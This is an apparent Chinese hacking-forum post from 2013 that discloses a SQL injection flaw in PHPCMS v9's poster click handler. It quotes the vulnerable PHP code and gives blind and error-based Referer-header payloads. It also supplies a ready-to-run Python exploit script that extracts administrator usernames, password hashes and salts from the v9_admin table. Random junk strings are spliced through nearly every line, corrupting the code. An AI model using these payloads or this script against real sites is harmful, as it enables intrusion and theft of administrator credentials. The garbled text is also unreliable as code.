有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
$ u' B, K. `4 o- C4 I: x. c$ r0 w% e5 y. f3 D, O3 \7 p6 M
问题函数\phpcms\modules\poster\index.php
3 z8 V6 L. }0 o' M+ c! S, v" o9 c" q. G8 L% N/ X
public function poster_click() {
. `8 F# ]* Y9 o( p) l, k; S) m$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
1 b+ p& ] x' W% d) `* B4 w$r = $this->db->get_one(array('id'=>$id));
. n( o9 [8 I5 V5 f- i/ N! W" _if (!is_array($r) && empty($r)) return false;
8 G% Z3 a: B6 A$ip_area = pc_base::load_sys_class('ip_area');
: _) N# H# n6 O* v& R& T$ip = ip();
$ ~( t4 ]4 u, n U$area = $ip_area->get($ip);
9 A1 ~: O! a$ q7 V0 w; Y: q* ^9 ^$username = param::get_cookie('username') ? param::get_cookie('username') : '';
, w) F( I6 t. ~2 K5 Q# b* T' m4 }if($id) {) U) [- V2 q( p3 k7 t5 u5 N
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();0 j: _3 l2 d( L. w$ y" q
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
" g& z, U6 H2 r/ U/ v}2 W# x; _* h4 G+ q+ `
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));6 ]. p; w8 m" E+ v3 A
$setting = string2array($r['setting']);$ s u2 F- I0 F- T5 g! D
if (count($setting)==1) {
9 f7 Y+ z5 n$ z3 _3 Z/ k7 t" P! M7 O$url = $setting['1']['linkurl'];- H$ i; j. f" v0 x
} else {
" e3 G% I" t! f& N$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
, I0 a* t' w2 u- C1 d}8 i: o4 v2 Z0 V0 ?
header('Location: '.$url);: K O& [$ k9 P, ^% g2 j3 q! ]+ \9 D& a# E
}
/ z+ D4 l! N+ ]- D
3 X1 Y0 h3 m" `0 e5 } # t8 d4 K- E3 R" D4 R, U
5 t, F* L2 |. k$ Z& s- x
利用方式:
* G# n+ o2 P5 e% ~
3 G$ Y0 y( j/ }; W( r1、可以采用盲注入的手法:) o7 D& r. A# X" K6 V3 [! i/ ~4 h% h" T
. z, @3 p9 ?% Y0 j* v
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#" l$ K; e6 X0 a# D
' x: V7 a; ^ \' L. x通过返回页面,正常与否一个个猜解密码字段。
2 x j9 ], n0 R
$ f$ W3 x9 `( Z, o r% Z* L2、代码是花开写的,随手附上了:
' g2 B8 ~7 r% q" h/ L6 U# G0 e" Q: n. {
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
. ~2 o0 Z9 v2 v
" g$ W% K$ G5 O$ s, f+ d! n此方法是爆错注入手法,原理自查。7 P3 \4 d, y, O& o7 j9 R
! d H* e! p: R! |' ~; P7 F* e
1 y* T1 {5 q3 b2 |8 C( g
" O0 {) H! h& p% U& S利用程序:
4 F7 C( e4 X8 S; D0 O( g* E$ \) H4 y
#!/usr/bin/env python k3 W4 [/ \5 V; z/ e' n' p: B
import httplib,sys,re
$ F* M4 G0 `+ S4 B8 S9 @1 u M
" [/ @: s/ h+ G# }9 ~( Zdef attack():
! G' W) Q; T- G8 J8 ~print “Code by Pax.Mac Team conqu3r!”& c# G x9 m% y. r. T3 D$ n4 n
print “Welcome to our zone!!!”# M: m' R& q g& V: p
url=sys.argv[1], X. \' g7 ^5 w9 H- M" A, b
paths=sys.argv[2]! Q. i7 K h& K5 Q
conn = httplib.HTTPConnection(url)
8 U( l7 D( D- {$ a u9 _! Ci_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
6 t. |7 W# p- @* \& V“Accept”: “text/plain”,
) P1 N- ~7 |' v3 k+ k“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
6 c+ K9 U% e/ G! V; Dconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)% R. C0 J) [: T g+ [' P
r1 = conn.getresponse()
* N/ D4 y7 x- b7 _datas=r1.read()
$ n. `1 t; v4 gdatas=re.findall(r”Duplicate entry \’\w+’”, datas)! e' x- @9 K& e, s# z
print datas[0]
3 G0 | a0 b9 kconn.close() c2 J2 o+ Z# l; L+ y
if __name__==”__main__”:: U, u; w6 Y" i/ ]% j
if len(sys.argv)<3:3 K2 f+ W4 i1 K! }1 L6 s
print “Code by Pax.Mac Team conqu3r”
* e) @) Z) F# d7 F7 Z0 W2 i7 l7 ]( xprint “Usgae:”
3 I6 U& \: z5 I6 n: g, ] M; @* @print “ phpcmsattack.py www.paxmac.org /”, ] \5 F; m$ I
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
+ c3 d% @' U, Z% b& H& h0 hsys.exit(1)
' Y# j+ I2 C n1 H' r% _attack()7 O! f: ^$ T& L- _
& p/ g7 }0 D, V9 [+ D
|
发表于 2013-1-11 21:01:00
收藏
支持
反对